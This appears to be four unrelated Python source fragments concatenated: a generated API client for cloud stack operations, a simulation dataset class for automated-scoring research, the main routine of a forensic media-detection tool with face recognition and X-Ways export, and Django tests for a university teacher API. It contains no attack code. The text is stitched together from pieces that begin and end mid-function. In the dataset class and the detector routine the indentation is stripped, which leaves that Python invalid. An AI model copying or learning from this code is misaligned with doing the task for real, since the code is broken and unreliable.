        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['tokenAuth']
    # Delegate the actual HTTP round trip to the shared API client.
    return self.api_client.call_api('/v1/stacks/{id}/cluster/gateway', 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='GatewayJson',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def upgrade_cluster(self, id, **kwargs):
    """
    upgrade the Ambari version
    Ambari is used to provision the Hadoop clusters.
    By default this performs a synchronous HTTP request; supply a
    `callback` keyword argument to make the call asynchronous instead.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.upgrade_cluster(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int id: (required)
    :param AmbariRepoDetails body:
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: callers only want the deserialized payload,
    # never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous path: hand back the request thread immediately.
        return self.upgrade_cluster_with_http_info(id, **kwargs)
    data = self.upgrade_cluster_with_http_info(id, **kwargs)
    return data
def upgrade_cluster_with_http_info(self, id, **kwargs):
    """
    upgrade the Ambari version
    Ambari is used to provision the Hadoop clusters.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.upgrade_cluster_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int id: (required)
    :param AmbariRepoDetails body:
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Every keyword this endpoint understands; anything else is a caller
    # error and is rejected below.
    all_params = ['id', 'body']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Validate caller-supplied kwargs and flatten them into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method upgrade_cluster" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `upgrade_cluster`")
    collection_formats = {}
    # `id` is interpolated into the URL path, not the query string.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['tokenAuth']
    # Delegate the actual HTTP round trip to the shared API client.
    return self.api_client.call_api('/v1/stacks/{id}/cluster/upgrade', 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def validate_stack(self, **kwargs):
    """
    validate stack
    Stacks are template instances - a running cloud infrastructure created based on a template. Stacks are always launched on behalf of a cloud user account. Stacks support a wide range of resources, allowing you to build a highly available, reliable, and scalable infrastructure for your application needs.
    By default this performs a synchronous HTTP request; supply a
    `callback` keyword argument to make the call asynchronous instead.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.validate_stack(callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param StackValidationRequest body:
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: callers only want the deserialized payload,
    # never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous path: hand back the request thread immediately.
        return self.validate_stack_with_http_info(**kwargs)
    data = self.validate_stack_with_http_info(**kwargs)
    return data
def validate_stack_with_http_info(self, **kwargs):
    """
    validate stack
    Stacks are template instances - a running cloud infrastructure created based on a template. Stacks are always launched on behalf of a cloud user account. Stacks support a wide range of resources, allowing you to build a highly available, reliable, and scalable infrastructure for your application needs.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.validate_stack_with_http_info(callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param StackValidationRequest body:
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Every keyword this endpoint understands; anything else is a caller
    # error and is rejected below.  (No required parameters here.)
    all_params = ['body']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Validate caller-supplied kwargs and flatten them into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method validate_stack" % key
            )
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['tokenAuth']
    # Delegate the actual HTTP round trip to the shared API client.
    return self.api_client.call_api('/v1/stacks/validate', 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def variants_stack(self, **kwargs):
"""
retrieve available platform variants
Stacks are template instances - a running cloud infrastructure created based on a template. Stacks are always launched on behalf of a cloud user account. Stacks support a wide range of resources, allowing you to build a highly available, reliable, and scalable infrastructure for your application needs.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
| |
"""
Module containing the Dataset class needed for PRMSE simulations.
:author: <NAME>
:author: <NAME>
:organization: ETS
:date: March 2020
"""
import sys
from pathlib import Path
import joblib
import numpy as np
import pandas as pd
class Dataset:
"""
Class encapsulating a single simulated dataset.
A class encapsulating a given simulated dataset as defined
by the number of responses, the number and type of human raters,
and the number and type of automated scoring systems, and other
attributes.
"""
def __init__(self,
num_responses=10000,
rater_categories=['low', 'moderate', 'average', 'high'],
system_categories=['poor', 'low', 'medium', 'high', 'perfect'],
num_raters_per_category=50,
num_systems_per_category=5,
rater_rho_per_category=[0.4, 0.55, 0.65, 0.8],
system_r2_per_category=[0, 0.4, 0.65, 0.8, 0.99],
min_score=1,
max_score=6,
true_score_mean=3.844,
true_score_sd=0.74):
"""
Create ``Simulation`` instance based on given settings.
Parameters
----------
num_responses : int
The total number of responses in this simulated dataset.
Defaults to 10000.
rater_categories : list of str
A list of string labels defining the possible rater
categories; a rater category is defined by the
inter-rater agreement in that category.
Defaults to ``['low', 'moderate', 'average', 'high']``.
system_categories : list of str
A list of string labels defining the possible automated scoring
system categories; a system category is defined by the agreement
of that system's predictions with the true scores.
Defaults to ``['poor', 'low', 'medium', 'high', 'perfect']``.
num_raters_per_category : int
An integer indicating the number of raters we want
to simulate in each rater category.
Defaults to 50.
num_systems_per_category : int
An integer indicating the number of scoring systems
we want to simulate in each system category.
Defaults to 5.
rater_rho_per_category : list of float
A list of pearson (rho) values that define each rater category.
The first rater category in ``rater_categories`` corresponds
to the first rho value in this list.
Defaults to ``[0.4, 0.55, 0.65, 0.8]``.
system_r2_per_category : list of float
A list of R^2 values that define each system category.
The first system category in ``system_categories`` corresponds
to the first R^2 value in this list.
Defaults to ``[0, 0.4, 0.65, 0.8, 0.99]``.
min_score : int
The lowest human score in this simulated dataset.
Defaults to 1.
max_score : int
The highest human score in this simulated dataset.
Defaults to 6.
true_score_mean : float
The desired mean we want for the simulated gold standard/true
scores.
Defaults to 3.844 based on a real dataset.
true_score_sd : float
The desired standard deviation we want for the simulated
gold standard/true scores.
Defaults to 0.74 based on a real dataset.
"""
self.num_responses = num_responses
self.rater_categories = rater_categories
self.rater_rho_per_category = rater_rho_per_category
self.num_raters_per_category = num_raters_per_category
self.system_categories = system_categories
self.system_r2_per_category = system_r2_per_category
self.num_systems_per_category = num_systems_per_category
self.min_score = min_score
self.max_score = max_score
self.true_score_mean = true_score_mean
self.true_score_sd = true_score_sd
# these attributes are initialized as empty for now
self._true_scores = None
self._rater_scores = []
self._rater_metadata = []
self._system_scores = []
self._system_metadata = []
@classmethod
def from_dict(cls, argdict):
"""Create a ``Dataset`` instance from the given dictionary."""
return cls(**argdict)
@classmethod
def from_file(cls, dataset_path):
"""Load ``Dataset`` instance from disk."""
dataset = joblib.load(dataset_path)
return dataset
def save(self, dataset_path):
"""Save ``Dataset`` instance to disk."""
# create the directory if it doesn't exist
dataset_dir = Path(dataset_path).parent
if not dataset_dir.exists():
dataset_dir.mkdir(parents=True)
# write out the dataset to disk
joblib.dump(self, dataset_path)
def save_frames(self, output_dir):
"""Save the frames obtained via ``to_frames()`` to disk."""
# create the directory if it doesn't exist
output_dir = Path(output_dir)
if not output_dir.exists():
output_dir.mkdir(parents=True)
# get the 3 data frames representing the dataset
(df_scores,
df_rater_metadata,
df_system_metadata) = self.to_frames()
# write out each of the frames to disk
df_scores.to_csv(output_dir / 'scores.csv', index=False)
df_rater_metadata.to_csv(output_dir / 'rater_metadata.csv', index=False)
df_system_metadata.to_csv(output_dir / 'system_metadata.csv', index=False)
def __str__(self):
"""Return a string representation of Dataset."""
ans = "Dataset ("
ans += f"{self.num_responses} responses, "
ans += f"scores in [{self.min_score}, {self.max_score}], "
ans += f"{len(self.rater_categories)} rater categories, "
ans += f"{self.num_raters_per_category} raters/category, "
ans += f"{len(self.system_categories)} system categories, "
ans += f"{self.num_systems_per_category} systems/category)"
return ans
def __repr__(self):
"""Return the official string representation of Dataset."""
return str(self)
def truncate(self, scores):
"""
Truncate given scores to range [``min_score``, ``max_score``].
Parameters
----------
scores : numpy.ndarray
Input array of scores to be truncated.
Returns
-------
truncated_scores : numpy.ndarray
Output array with each element of ``scores`` truncated to
the range [``min_score``, ``max_score``].
"""
truncated_scores = np.where(scores > self.max_score,
self.max_score,
np.where(scores < self.min_score,
self.min_score,
scores)
)
return truncated_scores
def _add_noise_to_true_scores(self,
error_sd,
seed,
round=True,
truncate=True):
"""
Add noise/error to the simulated true scores.
The noise/error terms are computed by sampling from a normal distribution
with a mean of 0 and the given error std. dev.
This method is useful for generating scores assigned by a hypothetical
human or automated rater that are usually defined in test theory as
true scores + measurement error.
Parameters
----------
error_sd : float
The std. dev. of the error term.
seed : int
The seed used to instantiate the ``numpy.random.RandomState``
instance from which the error terms are sampled.
round : bool, optional
Whether to round the computed rater scores.
Defaults to ``True``.
truncate : bool, optional
Whether to truncate the computed rater scores to the score
range defined for this dataset.
Note that truncation happens after rounding unless ``round``
is ``False``.
Defaults to ``True``.
Returns
-------
rater_scores : numpy.ndarray
Array of scores with noise added to original scores.
"""
# instantiate a PRNG with the given seed
prng = np.random.RandomState(seed)
# sample the error terms from the appropriate distribution
sampled_errors = prng.normal(0, error_sd, self.num_responses)
# add the error terms to the true scores and round
computed_scores = self._true_scores + sampled_errors
# if requested, round the scores to integers first
rounded_scores = np.round(computed_scores) if round else computed_scores
# if requested, truncate scores to the range defined for this dataset
truncated_scores = self.truncate(rounded_scores) if truncate else rounded_scores
return truncated_scores
def _generate_true_scores(self, seed):
"""
Generate true scores for simulated dataset.
This method simulates true scores based on the pre-defined
mean and standard deviation. The scores are sampled from the
normal distribution defined by ``train_score_mean`` and
``train_score_sd`` and are truncated to be in the range
[``min_score``, ``max_score``].
The generated scores are saved in the private ``_true_scores``
attribute.
Parameters
----------
seed : int
The seed used to instantiate the ``numpy.random.RandomState``
instance that generates the simulated true scores.
"""
# instantiate a PRNG with the given seed
prng = np.random.RandomState(seed)
# generate true/gold standard score from the normal distribution
# defined by the mean and standard deviation in settings
sampled_scores = prng.normal(self.true_score_mean,
self.true_score_sd,
self.num_responses)
# truncate the scores to the desired range
true_scores = self.truncate(sampled_scores)
self._true_scores = true_scores
def _find_best_error_sd_for_rho(self, rho, error_seed):
"""
Do a linear search for the best error std. dev. value.
Search for the error std. dev. value that gets us closest
to the given rho as follows:
(a) define a range of error std. dev. values
(b) generate error terms with each error std. dev. and compute
hypothetical rater scores by adding noise to the true scores
(c) compute the average inter-rater correlation for these scores
(d) return the error std. dev. value for which this average
inter-rater correlation is closest to our desired rho.
Parameters
----------
rho : float
The desired inter-rater correlation.
error_seed : int
The seed used to instantiate the ``numpy.random.RandomState``
instance which is then used to define the normal distribution
from which error terms are sampled.
Returns
-------
error_sds : numpy.ndarray
The array of error std. dev. values that is searched.
mean_correlations : numpy.ndarray
The array of mean inter-rater correlations corresponding
to each error std. dev. value
chosen_error_sd : float
The chosen error std. dev. value that yields the mean
inter-rater correlation closest to our desired rho.
"""
# set up an array of error std. dev. we will search over
error_sds = np.arange(0.01, 1.5, step=0.01)
# instantiate an empty list that will hold all the average inter-rater
# correlation for each error std. dev. value
mean_inter_rater_correlations = []
# sweep over the error std. dev. values
for error_sd in error_sds:
# instantiate a list that will hold the scores for all human raters
scores_for_all_raters = []
| |
after completion
pool.join()
pool.terminate()
result = [x for x in result if x != None]
for processedAudio in result:
speechPercentage, audiopath = processedAudio
# Check for the video flag
if not isinstance(speechPercentage, float):
logfile.write("Unsupported audio file: " + str(audiopath) + "\n")
else:
speechPercentage, audiopath = processedAudio
# Hashing the video once
hash_md5 = hashlib.md5()
with open(audiopath, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
hashvalue = hash_md5.hexdigest()
audiocounter += 1
if REPORT_FORMAT[0] == 'Nuix':
if speechPercentage != 0.0:
line = ",".join(["AUDIO-SPEECH", "md5:" + hashvalue])
else:
line = ",".join([Path(audiopath).name, hashvalue, str(speechPercentage), "AUDIO-SPEECH"])
detectionresults.write(line + "\n")
logfile.write("*" + str(datetime.now()) + ": \tAudio speech detection completed.*\n")
detectionresults.flush()
detectionresults.close()
return audiocounter
######
# Split the report file to allow seamless integration into XWays Hash Database per category
######
def createXWaysReport():
    """Split Detection_Results.csv into one hash list per detection category.

    Groups rows of the results CSV by their category column (index 3),
    appends each group's hash column (index 1) to ``<category>.txt`` inside
    ``PATH_TO_RESULTS/XWaysOutput``, then prepends an ``md5`` header line to
    every produced .txt file so it can be imported into the X-Ways Hash
    Database directly.

    Relies on the module-level ``PATH_TO_RESULTS`` set by the main block.
    """
    detectionresults_path = str(PATH_TO_RESULTS / 'Detection_Results.csv')
    xways_folder = PATH_TO_RESULTS / 'XWaysOutput'
    # exist_ok avoids the exists()/mkdir() race of a check-then-create
    xways_folder.mkdir(exist_ok=True)
    # the original passed csv.reader(open(...)) and leaked the file handle;
    # a context manager guarantees it is closed
    with open(detectionresults_path) as results_file:
        # NOTE(review): itertools.groupby only merges *adjacent* rows, but
        # opening the per-category files in append mode keeps the output
        # correct even when the CSV is not sorted by category.
        for key, rows in groupby(csv.reader(results_file),
                                 lambda row: row[3]):
            # skip the CSV header row
            if str(key) != 'category':
                # strip characters that are unsafe in file names
                key = str(key).replace("/", "-")
                key = key.replace(".", "").replace("(", "").replace(")", "")
                detectionresults_single_path = xways_folder / (key + '.txt')
                with open(str(detectionresults_single_path), 'a') as rf:
                    for row in rows:
                        rf.write(row[1] + "\n")
                    rf.flush()
    # Prepend each result list with 'md5' for seamless import into XWays
    for file in os.listdir(str(xways_folder)):
        if file[-3:] == 'txt' and file != 'Logfile.txt':
            with open(str(xways_folder / file), 'r+') as ff:
                content = ff.read()
                ff.seek(0, 0)
                ff.write('md5\n' + content)
######
#
# Main program function
# First initiates required parameters and variables, then loads the GUI
# After which the image and video load functions are triggered based on the input parameters
# Finally, the detection is executed and results written to the place requested
#
######
# Prevent execution when externally called
if __name__ == '__main__':
######
# Collecting parameters via GUI
######
sg.ChangeLookAndFeel('Dark')
layout = [[sg.Text('General Settings', font=("Helvetica", 13), text_color='sea green')],
[sg.Text('Please specify the folder holding the media data:')],
[sg.Input(), sg.FolderBrowse('Browse', initial_folder='/home/b/Desktop/TestBilder', button_color=('black', 'grey'))], #Path.home() = Initial folder
[sg.Text('Where shall I place the results?')],
[sg.Input(), sg.FolderBrowse('Browse', initial_folder='/home/b/Desktop/TestResults', button_color=('black', 'grey'))], #Path.home()
[sg.Text('TENSORFLOW DETECTORS')],
[sg.Checkbox('Objects/Persons', size=(15, 2)),
sg.Checkbox('Actions'),
sg.Checkbox('IS Logos'),
sg.Checkbox("Face Recognition")],
[sg.Text('OPEN VINO DETECTORS')],
[sg.Checkbox('Objects-fast', size=(15, 2)),
sg.Checkbox('Faces/Age/Gender')],
[sg.Text('Output Format:'), sg.Listbox(values=('Nuix', 'XWays', 'csv'), size=(29, 3))],
[sg.Text('Video Settings', font=("Helvetica", 13), text_color='sea green')],
[sg.Text('# of frames to be analyzed per Minute:', size=(36, 0))],
[sg.Slider(range=(1, 120), orientation='h', size=(29, 20), default_value=30)],
[sg.Text('Max. # of frames to be analyzed per Video:', size=(36, 0))],
[sg.Slider(range=(1, 500), orientation='h', size=(29, 20), default_value=100)],
[sg.Text('Check for & discard similar frames?'),
sg.InputCombo(('Yes', 'No'), default_value='No', size=(10, 2))],
[sg.Text('Face Recognition', font=("Helvetica", 13), text_color='sea green')],
[sg.Text('Specify folder with known faces (if FaceReq selected): ')],
[sg.Input(), sg.FolderBrowse('Browse', initial_folder='/home/b/Desktop/known', button_color=('black', 'grey'))],
[sg.Text('Specify face recognition tolerance (Default: 60%):', size=(48, 0))],
[sg.Slider(range=(0, 100), orientation='h', size=(29, 20), default_value=60)],
[sg.Checkbox('Output detected faces as jpg', size=(25, 2))],
[sg.Text('Audio Settings', font=("Helvetica", 13), text_color='sea green')],
[sg.Text('AUDIO PROCESSING')],
[sg.Checkbox('Speech Detection', size=(15, 2))],
[sg.OK(button_color=('black', 'sea green')), sg.Cancel(button_color=('black', 'grey'))]]
layout_progress = [[sg.Text('Detection in progress')],
[sg.ProgressBar(12, orientation='h', size=(20, 20), key='progressbar')],
[sg.Cancel()]]
# Render the GUI
gui_input = sg.Window('BKP Media Detector').Layout(layout).Read()
error = False
# Validate input
validateInput(gui_input)
# Initiating progress meter
updateProgressMeter(1, 'Initializing variables & parameters...')
startTime = datetime.now()
# Variable to determine minimum GPU Processor requirement & to disable TF log output
# os.environ['TF_MIN_GPU_MULTIPROCESSOR_COUNT'] = '5'
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
# Validating TF version
if StrictVersion(tf.__version__) < StrictVersion('1.9.0'):
raise ImportError('Please upgrade your TensorFlow installation to v1.9.* or later!')
# Defining multiple needed variables based on GUI input & adding TF/OpenVINO directory to path
PATH_TO_INPUT = Path(gui_input[1][0])
TEST_IMAGE_PATHS = Path.iterdir(PATH_TO_INPUT)
number_of_input = 0
for elements in Path.iterdir(PATH_TO_INPUT):
number_of_input += 1
PATH_TO_RESULTS = Path(gui_input[1][1])
PATH_TO_OBJECT_DETECTION_DIR = '/home/b/Programs/tensorflow/models/research' # PLACEHOLDER-tobereplacedWithPathtoDirectory
sys.path.append(PATH_TO_OBJECT_DETECTION_DIR)
REPORT_FORMAT = gui_input[1][8]
frames_per_second = gui_input[1][9] / 60
max_frames_per_video = gui_input[1][10]
video_sensitivity_text = gui_input[1][11]
KNOWN_FACES_PATH = gui_input[1][12]
facereq_tolerance = int(gui_input[1][13])/100
output_detFaces = gui_input[1][14]
if video_sensitivity_text == "Yes":
video_sensitivity = 20
else:
video_sensitivity = 0
# Check which models to apply and load their corresponding label maps
from object_detection.utils import label_map_util
graphlist = []
indexlist = []
MODEL1 = bool(gui_input[1][2])
if MODEL1:
OPEN_IMAGES_GRAPH = str(Path('Models/OpenImages/openimages.pb'))
OPEN_IMAGES_LABELS = str(OPEN_IMAGES_GRAPH)[:-3] + '.pbtxt'
OPEN_IMAGES_INDEX = label_map_util.create_category_index_from_labelmap(OPEN_IMAGES_LABELS)
graphlist.append(OPEN_IMAGES_GRAPH)
indexlist.append(OPEN_IMAGES_INDEX)
MODEL2 = bool(gui_input[1][3])
if MODEL2:
AVA_GRAPH = str(Path('Models/AVA/ava.pb'))
AVA_LABELS = str(AVA_GRAPH)[:-3] + '.pbtxt'
AVA_INDEX = label_map_util.create_category_index_from_labelmap(AVA_LABELS)
graphlist.append(AVA_GRAPH)
indexlist.append(AVA_INDEX)
MODEL3 = bool(gui_input[1][4])
if MODEL3:
SPECIAL_DETECTOR_GRAPH = str(Path('Models/ISLogos/islogos.pb'))
SPECIAL_DETECTOR_LABELS = str(SPECIAL_DETECTOR_GRAPH)[:-3] + '.pbtxt'
SPECIAL_DETECTOR_INDEX = label_map_util.create_category_index_from_labelmap(SPECIAL_DETECTOR_LABELS)
graphlist.append(SPECIAL_DETECTOR_GRAPH)
indexlist.append(SPECIAL_DETECTOR_INDEX)
FACE_RECOGNITION = bool(gui_input[1][5])
OPEN_VINO_vgg19 = bool(gui_input[1][6])
FACE_MODEL = bool(gui_input[1][7])
AUDIO_SPEECH_DETECTION = bool(gui_input[1][15])
# Update the progress indicator
updateProgressMeter(2, 'Process started. Loading ' + str(number_of_input) + ' media files...')
# Create logfile
logfile = open(str(PATH_TO_RESULTS / 'Logfile.txt'), 'w')
logfile.write('***DETECTION LOG***\n')
logfile.write("*" + str(datetime.now()) + ': \tProcess started. Loading images...*\n')
# Create resultsfile
detectionresults_path = PATH_TO_RESULTS / 'Detection_Results.csv'
detectionresults = open(str(detectionresults_path), 'w')
if REPORT_FORMAT[0] == 'Nuix':
detectionresults.write("tag,searchterm\n")
else:
detectionresults.write("name,hash,score,category\n")
detectionresults.flush()
detectionresults.close()
# Initiate needed variables
vidlist = []
audiolist = []
final_images = []
errors = []
# Multiprocess the image load function on all CPU cores available
pool = Pool(maxtasksperchild=100)
processed_images = pool.map(load_image_into_numpy_array, TEST_IMAGE_PATHS, chunksize=10)
pool.close()
# Synchronize after completion
pool.join()
pool.terminate()
# Clean the result for None types (where image conversion failed)
processed_images = [x for x in processed_images if x != None]
# Check for the different flags set by mimetype
for processed_image in processed_images:
if str(processed_image[1]) == "VIDEO":
# If present, populate the video list
vidlist.append(processed_image[0])
elif str(processed_image[1]) == "AUDIO":
audiolist.append(processed_image[0])
elif str(processed_image[1]) == "OCTET":
if processed_image[0][-3:] in ["mp4", "mov", "mpg", "avi", "exo", "mkv", "m4v", "ebm"]:
vidlist.append(processed_image[0])
else:
audiolist.append(processed_image[0])
elif str(processed_image[1]) == "ERROR":
errors.append(processed_image[0])
else:
# If not, put it to the final images list
final_images.append(processed_image)
for error in errors:
logfile.write(error)
logfile.flush()
# Count the number of images before adding the videoframes
number_of_images = len(final_images)
# Update the progress indicator
updateProgressMeter(3, 'Loading ' + str(len(vidlist)) + ' Videos...')
# Multiprocess the video load function on all CPU cores available
pool = Pool(maxtasksperchild=10)
videoframes = pool.map(load_video_into_numpy_array, vidlist, chunksize=2)
pool.close()
# Synchronize after completion
pool.join()
pool.terminate()
number_of_videos = 0
# Clean the result for None types (where video conversion failed)
for video in videoframes:
if type(video) is str:
errors.append(video)
if type(video) is list:
final_images.extend(video)
number_of_videos += 1
for error in errors:
logfile.write(error)
logfile.flush()
# Split the result from the loading function into hashes and image arrays
if len(final_images) != 0:
image_path, hashvalues, image_nps = zip(*final_images)
# Update the progress indicator & logfile
updateProgressMeter(4, 'Starting detection of ' + str(len(final_images)) + ' media files')
logfile.write("*" + str(datetime.now()) + ": \tLoading completed. Detecting...*\n")
# Conduct Face Recognition if needed
if FACE_RECOGNITION:
known_face_counter = faceRecognition(KNOWN_FACES_PATH, image_path, image_nps, hashvalues)
# Conduct OpenVino VGG19 Model if needed
if OPEN_VINO_vgg19:
run_inference_openvino(image_path, image_nps, hashvalues)
# Execute all other detection models
if len(final_images) != 0:
run_inference_for_multiple_images(image_path, image_nps, hashvalues)
# Conduct face/age/gender detection
if FACE_MODEL:
faceDetection(image_path, image_nps, hashvalues)
if AUDIO_SPEECH_DETECTION:
audiofiles_processed = audioSpeechDetection(audiolist)
else:
audiofiles_processed = 0
# Check whether an Xways report needs to be created
if REPORT_FORMAT[0] == 'XWays':
createXWaysReport()
# Write process statistics to logfile
logfile.write("*Results:\t\t\t" + str(PATH_TO_RESULTS / 'Detection_Results.csv*\n'))
logfile.write("*Total Amount of Files:\t\t" + str(number_of_input) + " (of which " + str(number_of_images + number_of_videos + audiofiles_processed) + " were processed.)*\n")
logfile.write("*Processed Images:\t\t" + str(number_of_images) + "*\n")
logfile.write("*Processed Videos: \t\t" + str(number_of_videos) + " (analyzed " + str(frames_per_second * 60) + " frames per minute, up to max. 500) with the check for content-based duplicates set to " + video_sensitivity_text + "\n")
logfile.write("*Processed Audio Files:\t\t" + str(audiofiles_processed) + "*\n")
logfile.write("*Applied models:\n")
for y in range(0, len(graphlist)): logfile.write("\t\t\t\t" + graphlist[y] + "\n")
if OPEN_VINO_vgg19: logfile.write("\t\t\t\tOpenVINO Object Detector\n")
if FACE_MODEL: logfile.write("\t\t\t\tFace-Age-Gender Detector\n")
if FACE_RECOGNITION: logfile.write("\t\t\t\tFace Recognition (Known faces detected: " + str(known_face_counter) + ")\n")
logfile.write("*Processing time:\t\t" + str(datetime.now() - startTime) + "*\n")
logfile.write("*Time per processed file:\t" + str((datetime.now() - startTime) / (number_of_images + number_of_videos + audiofiles_processed)) + "*\n")
logfile.flush()
logfile.close()
# Update progress indicator
sg.OneLineProgressMeter('BKP Media Detector', 12, 12, 'key', 'Detection finished',orientation='h',size=(100, 10))
# Deliver final success pop up to user
sg.Popup('The detection was successful',
'The results | |
'PA', 'lang': 'it'}
res = req.get(url, data=data)
assert res.json()['results'][0]['TeacherCVFull'] is None
data = {'department': 1}
res = req.get(url, data=data)
assert len(res.json()['results']) == 1
data = {'department': 1, 'role': 'PO'}
res = req.get(url, data=data)
assert len(res.json()['results']) == 0
data = {'department': 1, 'role': 'PA', 'lang': 'en'}
res = req.get(url, data=data)
assert len(res.json()['results']) == 1
data = {'regdid': 1}
res = req.get(url, data=data)
assert decrypt(res.json()['results'][0]['TeacherID']) == '111112'
data = {'regdid': 2}
res = req.get(url, data=data)
assert decrypt(res.json()['results'][0]['TeacherID']) == '111111'
data = {'regdid': 1, 'role': 'PA'}
res = req.get(url, data=data)
assert decrypt(res.json()['results'][0]['TeacherID']) == '111112'
data = {'cds': 1}
res = req.get(url, data=data)
assert len(res.json()['results']) == 0
class ApiTeacherStudyActivitiesUnitTest(TestCase):

    def test_apiteacherstudyactivitiesunittest(self):
        """Teacher study-activities endpoint: listing and year filters."""
        client = Client()

        # one organizational unit, one teacher, two covered courses
        unit = UnitaOrganizzativaUnitTest.create_unitaOrganizzativa(**{
            'uo': '2',
            'uo_padre': '1',
        })
        teacher = PersonaleUnitTest.create_personale(**{
            'id': 1,
            'nome': 'Simone',
            'cognome': 'Mungari',
            'cd_ruolo': 'PA',
            'id_ab': 1,
            'matricola': '111112',
            'fl_docente': 1,
            'flg_cessato': 0,
            'cd_uo_aff_org': unit,
        })
        regdid = DidatticaRegolamentoUnitTest.create_didatticaRegolamento()
        math_course = DidatticaAttivitaFormativaUnitTest.create_didatticaAttivitaFormativa(**{
            'af_id': 1,
            'des': 'matematica',
            'af_gen_des_eng': 'math',
            'ciclo_des': 'Primo semestre',
            'regdid': regdid,
            'af_radice_id': 1,
            'anno_corso': 1,
        })
        cs_course = DidatticaAttivitaFormativaUnitTest.create_didatticaAttivitaFormativa(**{
            'af_id': 2,
            'des': 'informatica',
            'af_gen_des_eng': 'computer science',
            'ciclo_des': 'Secondo semestre',
            'regdid': regdid,
            'af_radice_id': 2,
            'anno_corso': 2,
        })
        DidatticaCoperturaUnitTest.create_didatticaCopertura(**{
            'af': math_course,
            'personale': teacher,
            'aa_off_id': 2019,
            'fat_part_stu_des': '111',
            'fat_part_stu_cod': 'AA',
            'part_stu_des': '11',
            'part_stu_cod': 'A',
            'tipo_fat_stu_cod': 'ALF',
            'part_ini': 'A',
            'part_fine': 'Z'
        })
        DidatticaCoperturaUnitTest.create_didatticaCopertura(**{
            'af': cs_course,
            'personale': teacher,
            'aa_off_id': 2020,
        })

        url = reverse(
            'ricerca:teacherstudyactivities', kwargs={
                'teacherid': encrypt('111112')})

        # endpoint reachable
        response = client.get(url)
        assert response.status_code == 200

        # unfiltered listing
        response = client.get(url)
        assert response.json()['results'][0]['StudyActivityID'] == 2
        response = client.get(url)
        assert len(response.json()['results']) == 2

        # year filters and the number of coverages each should match
        for params, expected in (({'yearFrom': 2020}, 1),
                                 ({'year': 2020}, 1),
                                 ({'yearTo': 2020}, 2),
                                 ({'yearFrom': 2019, 'yearTo': 2020}, 2)):
            response = client.get(url, data=params)
            assert len(response.json()['results']) == expected
class ApiTeacherInfoUnitTest(TestCase):

    def test_apiteacherinfounittest(self):
        """Teacher-info endpoint: detail payload for two teachers."""
        client = Client()

